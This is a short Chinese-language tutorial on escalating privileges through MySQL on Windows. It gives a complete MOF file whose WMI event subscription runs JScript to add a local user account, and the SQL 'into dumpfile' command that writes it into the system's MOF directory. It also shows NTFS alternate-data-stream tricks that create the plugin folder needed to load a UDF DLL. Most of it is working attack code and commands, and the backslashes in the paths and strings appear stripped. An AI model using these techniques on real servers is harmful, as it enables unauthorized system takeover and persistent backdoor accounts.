一.mof 提权

1、找一个可写目录上传mof文件

#pragma namespace("\.rootsubscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "RootCimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa "Win32_LocalTime" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject("WScript.Shell")nWSH.run("net.exe user 1 1 /add")";
};

instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};

2、执行load_file或into dumpfile把文件导出到正确的位置

select load_file('C:/wmpub/mysql.mof') into dumpfile 'c:/windows/system32/wbem/mof/mysql.mof'

二 . UDF Can't open shared library

某些情况下，我们会遇到Can't open shared library的情况，这时就需要我们把udf.dll导出到libplugin目录下才可以，但是默认情况下plugin不存在

大牛研究出了利用NTFS ADS流来创建文件夹的方法

select @@basedir;   
//查找mysql的目录
select 'It is dll' into dumpfile 'C:Program FilesMySQLMySQL Server 5.1lib::$INDEX_ALLOCATION';   
//利用NTFS ADS创建lib目录
select 'It is dll' into dumpfile 'C:Program FilesMySQLMySQL Server 5.1libplugin::$INDEX_ALLOCATION';
//利用NTFS ADS创建plugin目录